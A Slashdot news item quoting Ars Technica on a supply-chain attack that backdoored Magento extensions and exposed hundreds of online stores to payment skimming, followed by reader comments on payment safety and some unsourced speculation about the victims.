Hundreds of E-Commerce Sites Hacked In Supply-Chain Attack (arstechnica.com) 16
An anonymous reader quotes a report from Ars Technica: Hundreds of e-commerce sites, at least one owned by a large multinational company, were backdoored by malware that executes malicious code inside the browsers of visitors, where it can steal payment card information and other sensitive data, security researchers said Monday. The infections are the result of a supply-chain attack that compromised at least three software providers with malware that remained dormant for six years and became active only in the last few weeks. At least 500 e-commerce sites that rely on the backdoored software were infected, and it's possible that the true number is double that, researchers from security firm Sansec said. Among the compromised customers was a $40 billion multinational company, which Sansec didn't name. In an email Monday, a Sansec representative said that "global remediation [on the infected customers] remains limited."
"Since the backdoor allows uploading and executing arbitrary PHP code, the attackers have full remote code execution (RCE) and can do essentially anything they want," the representative wrote. "In nearly all Adobe Commerce/Magento breaches we observe, the backdoor is then used to inject skimming software that runs in the user's browser and steals payment information (Magecart)." The three software suppliers identified by Sansec were Tigren, Magesolution (MGS), and Meetanshi. All three supply software that's based on Magento, an open source e-commerce platform used by thousands of online stores. A software version sold by a fourth provider named Weltpixel has been infected with similar code on some of its customers' stores, but Sansec so far has been unable to confirm whether it was the stores or Weltpixel that were hacked. Adobe has owned Megento since 2018.
"Since the backdoor allows uploading and executing arbitrary PHP code, the attackers have full remote code execution (RCE) and can do essentially anything they want," the representative wrote. "In nearly all Adobe Commerce/Magento breaches we observe, the backdoor is then used to inject skimming software that runs in the user's browser and steals payment information (Magecart)." The three software suppliers identified by Sansec were Tigren, Magesolution (MGS), and Meetanshi. All three supply software that's based on Magento, an open source e-commerce platform used by thousands of online stores. A software version sold by a fourth provider named Weltpixel has been infected with similar code on some of its customers' stores, but Sansec so far has been unable to confirm whether it was the stores or Weltpixel that were hacked. Adobe has owned Megento since 2018.
"Why reinvent the wheel" They asked Zog (Score:3)
So much for (Score:5, Informative)
Herd immunity. You'll all get hit if it's something that has never been seen before in the wild.
This is why I'm using virtual cards more and more for shopping online. Why? because e-commerce can be no safer than carrying your wallet, full of cash, in a dark alley at night.
Re: (Score:2)
Yeah, I do something similar. I use PayPal to pay everywhere. No direct card information is ever given out. I have a credit account with PP as well as a balance funded by direct deposit. So, everything is paid out of credit and I pay off the credit balance from the PP balance every month. It works out pretty slick, and a side benefit of doing recurring payments from PP is that I can cancel them right from there.
Re: (Score:2)
I did use PayPal awhile ago but their changing ToS and crappy service forced me to cancel them.
I remember... (Score:3)
I fondly recall the days when you could disable Javascript in your browser and the internet still worked. Since this is likely a Javascript-based exploit triggered by PHP code on the server then turning off Javascript would be a great mitigation -- but even if you could find a browser that allowed you to disable JS, it would instantly fail to render every website you visited.
Ah... the good old days of static HTML <BLINK>Yippee!</BLINK>
Re:I remember... (Score:4, Funny)
Re: I remember... (Score:2)
Does it? Last time I tried it without js, the whole page didn't load.
Re: (Score:2)
Re: (Score:2)
Well, you should be disabling JIT at least. Very few sites require it and that's where most 0 days live (according to Microsoft research, IIRC).
Turtles all the way down. (Score:5, Funny)
People's Supply-Chains Attack Them Due to Supply-Chain Attack By People on Chain of Suppliers
This could have your headline Slashdot but you missed it!
The 40 billion dollar company was Temu (Score:2)
Re: (Score:2)
I hardly ever shop online - and never in China - so all I knew about Temu was the name. Here is what the UK Consumer Association has to say about them [which.co.uk]. If this is a nation-state attack, I wonder if it's the NSA behind it - the nation which most dislikes China is the US (apart from Taiwan which would not dare).
Re: (Score:2)
Re: (Score:2)